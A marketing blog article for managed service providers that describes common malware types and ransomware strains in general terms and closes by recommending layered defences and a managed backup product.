As MSPs continue to upscale their clients’ cybersecurity resources, cybercriminals are seemingly not taking it lying down. They are, instead, increasingly responding with more sophisticated types of malware attacks. So much so that in 2019, for instance, 66% of managed service providers surveyed in a global study revealed that their clients had been hit by the famous CryptoLocker malware, while 49% had been affected by the WannaCry malware.
Other prevalent types of malware attacks that were reported include CryptoWall (34%), Locky (24%), Petya (17%), CryptXXX (14%), and NotPetya (12%).
Now, because of such worrying trends, we’ve decided to prepare a comprehensive guide that highlights all the common types of malware attacks that MSP clients are experiencing today.
But, before we dive into all that, let’s get the basics right. What exactly is malware?
Table of Contents
What Is Malware?
From the word itself, you can already tell that malware is somewhat a compound term derived from “malicious” plus “software”. And that’s precisely what it means.
In essence, malware refers to all forms of malicious software developed by hackers to attack and infiltrate computer systems. Some of the common types of malware include adware, worms, Trojan horses, spyware, ransomware, and viruses.
Let’s look into each one of them.
Common Types of Malware Attacks
Adware is an intrusive piece of software developed to deliver display ads such as pop-ups and website banners. You’ll mostly find this type of malware embedded in freeware or free service websites, through which it seeks to generate revenue from ad viewership.
Real-world examples of adware include DeskAd, Gator, DollarRevenue, Appearch, and Fireball.
While adware focuses on generating revenue from intrusive ads, malvertising is a type of malware that uses legitimate ads as camouflage. That means it appears as a legitimate ad, and then proceeds to deploy once you interact with the ad.
Consider, for instance, an ad banner that redirects you to a malicious site when you click on it.
Other real-world examples of malvertising include malware on landing pages, malware within Flash videos, malware within a pixel, and malware that is injected post-click.
Hybrids are usually a blend of two or more different types of malware attacks. You might, for instance, come across a Trojan horse that uses malvertising to disguise itself.
Another common type of hybrid is bots, as they typically rely on botnets to launch distributed denial of service attacks, infiltrate devices, send spam, and steal data.
Real-world examples include Kelihos, Mariposa, Waledac, Zeus, and Conficker.
Ransomware is designed to take over a computer system by encrypting its files, after which it proceeds to demand a ransom from the computer user. The objective here is to convince victims to send money in order to gain access to their blocked files.
Further reading Stay safe from ransomware with MSP360
Common Types of Ransomware
The thing about ransomware is it comes in various forms and strains. You might particularly want to look out for these notoriously common variants:
- ZCyptor: Tends to act like a worm. It distributes itself through external drives, and then proceeds to encrypt files in the infected computers.
- WannaCry: Has so far managed to hit more than 125,000 companies across over 150 countries. It specifically capitalizes on Microsoft’s EternalBlue to attack Windows systems.
- CryptoLocker / TorrentLocker: Distributed via spam emails, after which it encrypts infected files via an AES algorithm.
- TeslaCrypt: Deploys itself after taking advantage of Adobe vulnerabilities. And, just like CryptoLocker, TeslaCrypt encrypts files using an AES algorithm.
- Spider: Comes in the form of malicious macros concealed in a Word document, which is usually distributed as a debt collection notice via spam emails.
- Ryuk: Reportedly responsible for over 30% of 2020s ransomware attacks, Ryuk goes for critical files in organizations.
- Petya: Makes the OS unbootable by encrypting all the files, including the master boot record.
- NotPetya: Designed to completely destroy files without demanding ransom.
- Locky: Often distributed via spam email as a scrambled “invoice”, which then tricks victims into encrypting their files by enabling macros.
- KeRanger: Possibly the first comprehensive malware that was developed specifically to target and lock macOS applications.
- Jigsaw: Once it encrypts files, Jigsaw proceeds to progressively delete them until the ransom is settled.
- GoldenEye: Tends to target human resource departments. Once it’s downloaded, it deploys through a macro, which then goes ahead and encrypts files while overriding the master boot record with a custom boot loader.
- Crysis: Uses a strong algorithm to attack and encrypt files on network, removable, and fixed drives.
- CryptoWall: Comes in the form of a Trojan horse concealed in spam or exploit kits.
- Cerber: Designed specifically to attack users running cloud-based Microsoft 365.
- Bad Rabbit: Disguises itself as an Adobe Flash update on malicious websites.
Further reading Ransomware Attack Scenarios
Phishing attacks are orchestrated through fraudulent attacks that disguise themselves as legitimate messages/websites/web forms from a reputable company. If you fall for it, you end up submitting private information like credit card digits, passwords, etc.
Types of phishing
There are three primary types of phishing attacks:
- Spear phishing: This is a phishing attack that, instead of randomly going for a large group of people, happens to target a specific individual. Hence, it comes in the form of a personalized message.
- Whaling: This is a much more professional-looking fraudulent message that targets a company’s top-level executives.
- Clone phishing: Clone phishing entails creating fraudulent messages by reproducing past copies of legitimate emails.
Real-world examples of phishing include wire transfer scams, Craigslist money scams, wire transfer scams, deactivation scares, Nigerian scams, tech support scams, and SEO trojans.
Rootkit malware is capable of bypassing security systems and gaining unauthorized access to data without detection. That means an attacker can remotely compromise your system without leaving any sign of infiltration.
Real-world examples of rootkit include Rkit, Adore, and Knark.
Spyware keeps tabs on your activities while running stealthily in the background. In this way, they often manage to piece together keystrokes and harvest sensitive data.
Real-world examples of spyware include BlazeFind, Internet Optimizer, ISTbar/AUpdate, 180search Assistant, Gator (GAIN), and CoolWebSearch.
A Trojan horse, or trojan for short, tends to remain concealed while disguising itself as a legitimate application. Consequently, it manages to trick victims into installing the malware into their systems.
Notable examples of Trojan horse malware include Tiny Banker Trojan, ZeroAccess, MEMZ, DarkComet, Magic Lantern, and FinFisher.
A virus is any malware that, upon activation, manages to replicate within the system, and then spread the infection to other connected devices.
Some of the famous real-world examples of computer viruses include Melissa, Win32.Cabanas, Bizatch virus, and WinVir Stuxnet.
Unlike viruses, a computer worm is capable of replicating itself and spreading independently. That means it can go ahead and wreak havoc without human activation.
Real-world examples of computer worms include Anna Kournikova, MyDoom, and ILOVEYOU.
Social engineering attacks attempt to manipulate victims through psychological tricks. And, in particular, attackers are quite fond of preying on human emotions to trick their victims.
Some of the common real-world social engineering techniques include pretexting, scareware, and baiting.
Just as the name suggests, fileless malware isn’t distributed as an independent file. Instead, it manages to infect computers by concealing itself within genuine programs. This allows it to run in the background without leaving any footprint.
Real-world examples of fileless malware include Astaroth, Misfox, WannaMine, Operation Cobalt Kitty, and The Dark Avenger.
Malware Chart for MSPs
|Malware Type||What It Does||Real-World Example|
|Adware||Delivers intrusive display ads such as pop-ups and website banners.||DeskAd.|
|Malvertising||Uses legitimate ads as camouflage.||Malware within Flash videos.|
|Hybrid||A blend of two or more different types of malware attacks.||Zeus.|
|Ransomware||Encrypts computer files, after which it proceeds to demand a ransom.||CryptoLocker.|
|Phishing||Fraudulent messages disguised as legitimate.||Nigerian scams.|
|Rootkit||Gains unauthorized access to data without detection.||Knark.|
|Spyware||Monitors your activities while running stealthily in the background.||Gator.|
|Trojan horse||Remains hidden while disguising itself as a legitimate application.||DarkComet.|
|Virus||Upon activation, manages to replicate within the system, and then spread the infection to other connected computers.||Melissa.|
|Worm||Replicates itself without activation and spreads independently across devices.||MyDoom.|
|Social engineering||Manipulates victims through psychological tricks.||Pretexting.|
|Fileless malware||Hides within genuine programs and runs in the background without leaving any footprint.||The Dark Avenger.|
How To Protect Your Business from Malware
So far, we’ve seen that MSP clients are still falling victim to different types of malware, despite leveraging cybersecurity tools and strategies such as pop-up blockers, email filters, antivirus software, and endpoint detection platforms. These alone are proving not to be sufficiently effective in combating the increased cases of malware attacks.
Hence, you might want to take a different approach and adopt a multi-layered framework –- one that combines cybersecurity tools with disaster recovery and business continuity solutions.
You could, for instance, put together firewalls, end-user training, anti-malware and antivirus software, email and web filtering, along with patch and update management, network monitoring, plus managed detection and response services.
And as the Last Line of Defence...
To top it all off, consider reinforcing your cybersecurity framework with managed backup. This is where you adopt an automated backup solution such as MSP360 Managed Backup, and then use it to streamline all your backup and monitoring tasks.